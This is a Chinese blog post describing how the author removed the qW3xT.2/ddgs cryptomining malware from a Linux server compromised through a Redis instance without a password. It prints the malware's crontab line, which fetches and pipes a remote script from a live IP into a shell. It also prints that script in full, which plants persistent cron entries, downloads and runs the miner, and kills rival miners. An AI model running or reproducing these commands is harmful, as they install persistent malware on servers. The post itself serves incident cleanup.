找回密码
 立即注册
  • QQ空间
  • 回复
  • 收藏

Linux 下qW3xT.2,解决挖矿病毒

币看世界| 2018-10-12 00:16 阅读 1227 评论 1

早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。

Linux 下qW3xT.2,解决挖矿病毒


在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法:

1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

肯定是有守护进程,观察top命令下的进程,发现一个可疑的进行

Linux 下qW3xT.2,解决挖矿病毒


3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时,首先删除qW3xT.2文件和ddgs.3013文件,然后使用top查询qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -r //删除计划任务

curl 的这几个 optional 介绍,我也是百度的

-f - fail在HTTP错误(H)上静默失败(根本没有输出)

-s -silent静音模式。 不要输出任何东西

–socks4 HOST [:PORT]给定主机+端口上的SOCKS4代理

–socks4a HOST [:PORT]给定主机+端口上的SOCKS4a代理

–socks5 HOST [:PORT]给定主机+端口上的SOCKS5代理

–socks5-hostname HOST [:PORT] SOCKS5代理,将主机名传递给代理

–socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称

–socks5-gssapi-nec与NEC SOCKS5服务器的兼容性

-S –show-error显示错误。 使用-s时,make curl会在出现错误时显示错误

-L –location遵循重定向(H)

–location-trusted like –location并将auth发送给其他主机(H)

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

计划任务删除完成之后,这个13又开始运行。太顽固了。

于是我又看计划任务的内容,是否是有东西没有删除干净。
[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.shexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013if [ ! -f "/tmp/ddgs.3013" ]; then curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs killps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs killps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs killps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill发现计划任务在服务器中创建了几个文件,/var/spool/cron/crontabs/root/var/spool/cron/root内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)将计划任务中创建的文件删除。

最终,这个挖矿病毒终于删除完成

本文仅代表作者个人观点,不代表巨推链平台发声,对文章观点有疑义请先联系作者本人进行修改,若内容非法请联系平台管理员,邮箱cxb5918@163.com。更多区块链资讯,请到百万区块链发烧友聚集平台巨推链www.jutuilian.com学习区块链技术请到巨推学院www.jutuiedu.com
  • 卜静 2018-10-12 00:23
    我也遇到过,跟你的情况类似[捂脸]
文章点评
2019-06-16 15:23
数字币 比特大陆的2018年度报告:扩张存在问题,回归核心业务,实现精细
当进入新的一年,我们对比特大陆在过去 2018 年的情况做了一些反思,并对未来一年寄予 <详情>
2019-06-16 09:59
数字币 美国怀俄明州:将给予比特币与法定货币同等法律地位
近日,怀俄明州提出一项法案,计划将比特币等加密货币置于与法定货币同等的法律地位, <详情>
2019-06-16 08:34
数字币 更好的比特币,真的存在吗?
来自美国高等院校的一支教授团队共同创造了一个新型可扩展的去中心化支付系统,并且被 <详情>
2019-06-16 01:33
数字币 2019年的第一匹黑马,一众大咖极力推荐的MimbleWimble如何就成了
MimbleWimble,出自《哈利波特》系列中出现的一个咒语,如今成为了区块链领域最火的协 <详情>
2019-06-16 00:38
数字币 区块链入门:EOS为什么连创建账户都这么复杂?有捷径吗?
不少人想体验EOS DApp,却被EOS的各种专业术语难住了。白话区块链曾专门写过《想要玩 <详情>
2019-06-15 23:04
数字币 门罗开发者首谈Grin:并不害怕被取代
Grin和Beam已经成为了最近隐私领域最炙手可热的话题,这两种币都基于MimbleWimble协议 <详情>
2019-06-15 19:52
数字币 从200年前的金本位制度说起,第一个比特币死忠粉或许是牛顿
前言:200年前,牛顿从“不学无术的”炼金师升级为伦敦皇家铸币厂负责人,最终创造了 <详情>
2019-06-15 18:01
数字币 基于Mimblewimble的Beam区块链今日停止出块近两个半小时
1月21日晚,最近刚刚发布的拓展性隐私加密货币Beam称其区块链遭遇到了技术困难。Beam <详情>
2019-06-15 12:14
应用 属于中国人的技术!百度宣布自研底层区块链技术XuperChain开源!
近年来,我国各行各业迅猛发展,但不少尖端行业和产品仍然依赖进口,关键领域受制于人 <详情>
2019-06-15 11:39
数字币 8年内,数字货币市场新增的8万亿美元可能来自这5个“金主”
数字货币踏入熊市近一年,近两个月的回调为投资者带来了积极情绪。价格回暖受多方因素 <详情>
2019-06-15 01:13
数字币 专访以太核心开发者,解读以太坊“双分叉”
北京时间 1 月 18 日晚 22:00 点,包括 Vitalik Buterin、Martin Holste Swende、Afri <详情>
2019-06-14 16:15
数字币 现代密码学加密原理
密码学是在区块链技术中承担着非常重要的角色,但其实,在互联网中,也大量的使用着密 <详情>
2019-06-14 13:56
+场景 打通链上链下,只有物联网设备才能让区块链发挥大作用
文/金九链早期的互联网,是纯线上的。那个时候人们需要“上网”。上是一个动作,只有 <详情>
2019-06-14 12:24
+场景 区块链中随机数安全问题
前言“随机数”在计算机程序中并不少见,开发人员也会经常使用随机数进行数值的模拟、 <详情>
2019-06-14 10:51
+场景 "伪努力"正在毁掉80%的当代区块链开发者
出品 | CSDN、灵钛科技小伙伴们都知道,近期链圈最热闹的活动,莫过于6月29日~30日, <详情>
2019-06-14 10:01
业界 高盛、百度和比特大陆都追捧的Circle,向美国监管宣战了
免责声明:本文不构成任何投资建议。小编:记得关注哦猛戳:火星财经App下载文章来源 <详情>
2019-06-14 09:22
+场景 “区块链钱包”的技术颠覆在哪里?看完这篇终于明白了
每当进行数字资产投资时,我们不能仅仅依靠交易所来存储数字资产,我们更需要有个自己 <详情>
2019-06-14 08:11
+场景 区块链革命?看看大佬们怎么说
币圈是一个兴起于草根的江湖,这个江湖中的人本在主流社会籍籍无名,其中有似陈胜吴广 <详情>
2019-06-14 07:01
+场景 区块链思维——序章
“学而不思则罔,思而不学则殆。”希望《区块链思维》能帮助你成为一个“聪明人”... <详情>
2019-06-14 05:41
+场景 区块链+不动产交易平台=数字产权的新时代
区块链技术被认为是继蒸汽机、电力与互联网之后,下一代颠覆性的核心技术。蒸汽机释放 <详情>